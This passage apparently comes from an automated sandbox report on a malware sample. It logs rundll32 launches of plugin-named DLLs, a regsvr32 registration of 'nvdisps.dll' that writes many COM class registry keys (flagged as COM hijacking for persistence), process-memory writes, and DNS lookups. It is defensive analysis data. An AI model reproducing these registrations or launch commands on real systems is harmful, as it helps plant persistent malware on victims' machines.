PID 2716 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4224 wrote to memory of 3988 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

151s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.TVWizard\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorCorrection\CurVer\ = "DisplayServer.ColorCorrection.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\VersionIndependentProgID\ = "DisplayServer.MultiMon" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID\ = "DisplayServer.RotateDisplay.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.NameDisp.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ProgID\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.IdentifyDisp.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{894BF76C-115F-44B7-9B32-ABFA7E6A804A}\ProgID\ = "DisplayServer.MultiView.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos.1\CLSID\ = "{074BFFFD-4E50-42c1-A7EB-40D9D70F2471}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt\CLSID\ = "{6539579C-2657-45E5-985F-835E197959C2}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\ = "CustomRez Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\ = "MultiMon Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\VersionIndependentProgID\ = "DisplayServer.VideoHDCPStatus" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\VersionIndependentProgID\ = "DisplayServer.Config" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ = "RotateDisplay Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID\ = "{01367108-5EE2-4E1C-A8DE-24438065ABC9}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ProgID\ = "DisplayServer.IdentifyDisp.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez\CurVer\ = "DisplayServer.CustomRez.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\VersionIndependentProgID\ = "DisplayServer.AdjustSizePosExt" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ = "TVWizard Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID\ = "{80BA3813-908F-4D4C-A5FF-263640AD5B7A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon.1\CLSID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CurVer\ = "DisplayServer.DualView.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID\ = "{EEF5290C-7F3D-4640-93F2-F189DC616510}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView.1\CLSID\ = "{894BF76C-115F-44B7-9B32-ABFA7E6A804A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CLSID C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2316 wrote to memory of 2736 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Network

N/A

Files

N/A